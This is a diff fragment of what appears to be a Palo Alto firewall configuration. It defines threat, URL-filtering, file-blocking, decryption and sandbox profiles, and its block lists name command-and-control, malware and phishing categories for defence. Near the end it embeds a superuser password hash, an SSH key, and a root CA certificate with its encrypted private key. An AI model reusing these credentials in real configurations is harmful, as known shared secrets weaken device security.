+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-VP">
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-VP">
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-VP"/>
+            </vulnerability>
+            <url-filtering>
+              <entry name="Outbound-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>White-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+              <entry name="Alert-Only-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <alert>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>White-List</member>
+                  </alert>
+                </credential-enforcement>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>command-and-control</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>Black-List</member>
+                  <member>White-List</member>
+                </alert>
+              </entry>
+              <entry name="Exception-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>White-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+            </url-filtering>
+            <custom-url-category>
+              <entry name="Black-List">
+                <type>URL List</type>
+              </entry>
+              <entry name="White-List">
+                <type>URL List</type>
+              </entry>
+              <entry name="Custom-No-Decrypt">
+                <type>URL List</type>
+              </entry>
+            </custom-url-category>
+            <file-blocking>
+              <entry name="Outbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>dll</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-FB">
+                <rules>
+                  <entry name="Alert-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                  <entry name="Block">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>7z</member>
+                      <member>bat</member>
+                      <member>chm</member>
+                      <member>class</member>
+                      <member>cpl</member>
+                      <member>hlp</member>
+                      <member>hta</member>
+                      <member>jar</member>
+                      <member>ocx</member>
+                      <member>pif</member>
+                      <member>scr</member>
+                      <member>torrent</member>
+                      <member>vbe</member>
+                      <member>wsf</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>block</action>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-FB">
+                <rules>
+                  <entry name="Alert-Only">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <action>alert</action>
+                  </entry>
+                </rules>
+              </entry>
+            </file-blocking>
+            <data-filtering/>
+            <data-objects/>
+            <hip-objects/>
+            <hip-profiles/>
+            <dos-protection/>
+            <decryption>
+              <entry name="Recommended_Decryption_Profile">
+                <ssl-forward-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                  <block-unknown-cert>yes</block-unknown-cert>
+                  <block-timeout-cert>yes</block-timeout-cert>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-cipher>yes</block-unsupported-cipher>
+                </ssl-forward-proxy>
+                <ssl-no-proxy>
+                  <block-expired-certificate>yes</block-expired-certificate>
+                  <block-untrusted-issuer>yes</block-untrusted-issuer>
+                </ssl-no-proxy>
+                <ssl-inbound-proxy>
+                  <block-unsupported-version>no</block-unsupported-version>
+                  <block-unsupported-cipher>no</block-unsupported-cipher>
+                </ssl-inbound-proxy>
+                <ssh-proxy>
+                  <block-unsupported-version>yes</block-unsupported-version>
+                  <block-unsupported-alg>yes</block-unsupported-alg>
+                </ssh-proxy>
+                <ssl-protocol-settings>
+                  <min-version>tls1-2</min-version>
+                  <keyxchg-algo-rsa>no</keyxchg-algo-rsa>
+                  <enc-algo-3des>no</enc-algo-3des>
+                  <enc-algo-rc4>no</enc-algo-rc4>
+                  <auth-algo-sha1>no</auth-algo-sha1>
+                </ssl-protocol-settings>
+              </entry>
+            </decryption>
+            <wildfire-analysis>
+              <entry name="Outbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+            </wildfire-analysis>
+            <gtp/>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$cymvlwsn$RRpD0YIgly7MQi2OwhBhV0</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=</public-key>
+      </entry>
+    </users>
+    <password-complexity>
+      <enabled>yes</enabled>
+      <minimum-length>8</minimum-length>
+    </password-complexity>
+  </mgt-config>
+  <shared>
+    <certificate>
+      <entry name="rootCA">
+        <subject-hash>e8d8421e</subject-hash>
+        <issuer-hash>e8d8421e</issuer-hash>
+        <not-valid-before>Mar 25 14:04:21 2020 GMT</not-valid-before>
+        <issuer>/CN=GP-CA</issuer>
+        <not-valid-after>Mar 25 14:04:21 2021 GMT</not-valid-after>
+        <common-name>GP-CA</common-name>
+        <expiry-epoch>1616681061</expiry-epoch>
+        <ca>yes</ca>
+        <subject>/CN=GP-CA</subject>
+        <public-key>-----BEGIN CERTIFICATE-----
+MIICwDCCAaigAwIBAgIJANrYfmxATInkMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
+BAMTBUdQLUNBMB4XDTIwMDMyNTE0MDQyMVoXDTIxMDMyNTE0MDQyMVowEDEOMAwG
+A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCsRu/s
+uKqCjcZ72Yw5vN7HOQ8VoRZdafB8FAPNS5+Az+9KBNlKRAIT9K342JDZis4loQ3T
+iN6rw8h2tN3vQH987q31bSTUT3ztd82gl/EzRexRNcGwQzm4VgtbzmTm2qnqqIps
+DueALRDu0SZZX++EWufWxko5wiz+rk0ie3KgGYXJlFzf70Hwnf5P6/fWOIHutk9b
+5n4CP1JMdP5ihF8EmRxwqTDzUpBU+MKU+QkpGkIh4dADvDiPEi55N9sRWkqxqOP5
+E78OxxUKGZua1eItevFjU45fQRKc2tyavVIhQjy/Z044rqJF60mt+r0v6er7i3o6
+KluBdl7P9dLeGdahAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE
+MA0GCSqGSIb3DQEBCwUAA4IBAQBH5ANVFfZjJNCT+/448Ic3xCj5R5PepeATU45m
++nGNhjVpE4615A4gnKbBdY0m/LDLJX0tmlmGLPNxJzIyW65gz0i9fXtNydp3Bw6c
+j9HD78IJST3o8wxREMzii+qhHyyv7Z3rjVYl2ZCQleWJ/Sl1u4Fui1pv1TSJ9g76
+nlWZYAvojlohXKZ+w8ApPantfAYtbh2cxfeml5abP7SfRDOWJxnNH/t/4fkwbh2t
+TiKlWPCWC97tIqhu8tGZAVcW10pi3OJxT7FQ3n85p3xC59SgkN7O4W2Z/v9JnYan
+QvnpOZcbAGndlh45yV1ePK+NiAgRPRYfL7M18pPXXaWdfr1L
+-----END CERTIFICATE-----
+</public-key>
+        <algorithm>RSA</algorithm>
+        <private-key>-AQ==cCMHUK/S6nkVFYzdgY+hCSo7iGU=wfL5Zc+wUAak+B7CnAVY6NdutYWtt67XvF+yGHFGS+vmQugtSrA952XGaQ20AVyR7oTxBSCRysONDqC5jA2dcYfLHl6mEZpl+1rHX8CbAmYbQtL0QkIpmA0+Y2J920f65MgcSatnqCmCgj+Nl94w7rIIhR3oKi5H6mq+7NT1UzO0gb++ktkFsC/6TIAwE7PN6wKLZTjXxlsDrP931l4EJ+psIUMH2agwpUEm44m3XHbTZ3EhMjTdWHjegV5+l/zCUuUDBGVNt8oeQsPO8Nk2cZHPurp8001Jrvc/7InYNrMECNNf9C2K3WGhTcYbHvmi+gOiUx2LlqrG+gO7yQOwFqMBhKeHiQg8iXsuuEbrFeWYwLRjObrS6HN+cwBnhJTFMiYjS9lWACrWY35+ytaKhkXo6zf9XKtf6f+9/AULzzx0xyPXRnmLjVLrg9Gcy8DDgn4hEsQO6kug4g2tNllHKEeniMVObX0FGgKieh+hYhaiGq4GCPQwFzmLt0EAS8ROYeL3rsn0/KDpWk9tzkIX56yQsneQaNYjuIZyTTMqVDu0QubwHV2lfqcmbXooA8P5lbHqoLx/F38JFP2W1oAOE1GiG6haRiqhdpndEQ8nZbDhMgTuAwXDXaZ5ypKD6oX0DAOQs+Tt/YyLtnc/9LuDtDj6DWIrPQcj24FrjMzRvGCTcI4AfMtRcmqj+mR/UgvXUzHLtmqcUSpfGQ3vg3oL4JgL20yhbAVshnVxaInNjTylpbf9zkrwLoRe6R2SHYhVkkgCp1tnBMIB7u80LWoDnrH4PGs4tshS8QweW5oTftlvgEo1NhJk74fla0+7ZVBuG/Ma381QGNGDXWbtskFKXeNUxaf9TkVPuY6jk6tZHNeuPaGa3a32ZL2LeL0DeoynhwL3HjOL47iosxaUV93zwZne+Fez837OdzOm0fPkN4wf9C7wsx2VvXjRtXjehUZaqjlQA27DpKNNpsRLbvMdldaBbSEmOUXXakBykaPwOuNLhOmKR8mX1dtvZaKurUjx2nMIq6oyGXZndPGYpIUvD1iujvn1lktmleK3uKpK4MEY1hYGSg3G+Ftuz/LNK1iXCcJVOYTdyi7lzMyK2zLe6nJgjXHxQPd0OfCZas+70NcL9ldyM1v0N9so3kuKB8wupaEaBdRwu2CnUJwtFysQLWVjUiQ9nHo/rB43r3OJ606I/Bccdv0+QBpZDjV4CcNqkjoRYueo7yYlZY7bTS0riuCVJzHL2q5AXz1HNSyCn6BpU9vse+yr04J9khzWpC9Z4rY1ahb7x9WL8iqXyeIvU1qIclNgwO+wHRdx0rQjCL6Ihx6GQ/ojgcVCZ9dAEOyfOTMYIHcBb5JJM1VFrETaLeMVaRJHybShyE88rYXXE0ma4ZRvLHQh0Sah6T6fr4dzFiBCEhGgYbMGvEMrbqFNJJwMoOeAxJokqCVEVlBEhdFaYNM9l1w0J+TUldbebQhcNhxolpcICGfU1+JENl7ZA0nXw4VUioxRUF/lhaJgP48i3MP0yajn/hBH0RjCTVEcfbNEbOehlG+DIWVW/uD0m/gjNKVK+wTd1CIFJ+M3xX9kw0rtlaoH/iLUhDkmt4IGHJnM5nJW0UtbW/a8IAmkPbFP92cScej3ZEDL6ee/WWI1l4sGBUxwuSA9NK9kMHO3cXakcw8EWd/uIwXDpXhryZaqbuqR9+u1R9sF9NxW7YnVSc0C/ldOXW2Q0uptqtOOfCznxv7i4YOxdZdIE0kOoq8pdOi3qqW7jPrFZFuOHUN8UMhzyYzAriB82dgucOlvzKYmE5CNZSAuoPJXtAEEza1g2jaqQHEtq4BT+N2imBlsm6RMu/FhwQKo18LdiMMd3ck911ZIAxRaGfWp9GrHgD9ngjAzb3EG5eSdPMCe/Z8S4ChOL+peJMVTSTI1dDoriinj5Wos+dgcx5+B5JEmJPFq8nwa6n